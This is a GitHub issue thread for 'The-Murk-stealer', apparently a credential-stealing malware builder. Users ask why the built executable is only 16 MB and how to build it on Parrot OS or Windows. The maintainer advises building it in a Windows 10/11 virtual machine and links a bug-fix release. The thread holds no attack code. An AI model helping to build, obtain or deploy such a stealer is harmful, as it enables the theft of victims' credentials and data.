### ISSUE TITLE
I only got a 16mb output now

### ISSUE THREAD

**Issue by CutyCat2000** [Nick-Vinesmoke/The-Murk-stealer#61]
I completely reinstalled python. now I got a 16MB output exe only...

**Comment by Nick-Vinesmoke** [comment]
> I completely reinstalled python. now I got a 16MB output exe only...

HOW

**Comment by Nick-Vinesmoke** [comment]
It won't work

**Comment by Nick-Vinesmoke** [comment]
I'll try to help you

**Comment by CutyCat2000** [comment]
ok, thanks

**Comment by proton-crypto** [comment]
hello how do i go about this i have parrot os

**Comment by proton-crypto** [comment]
how do i build this now am on windows?

**Comment by Nick-Vinesmoke** [comment]
> how do i build this now am on windows?

build it at VM

**Comment by Nick-Vinesmoke** [comment]
> how do i build this now am on windows?

with win 10 or 11

**Comment by Nick-Vinesmoke** [comment]
This topic should be closed

**Comment by Nick-Vinesmoke** [comment]
https://github.com/Nick-Vinesmoke/The-Murk-stealer/releases/tag/The_Murk_v8.1.0 new release with all bugs fixed
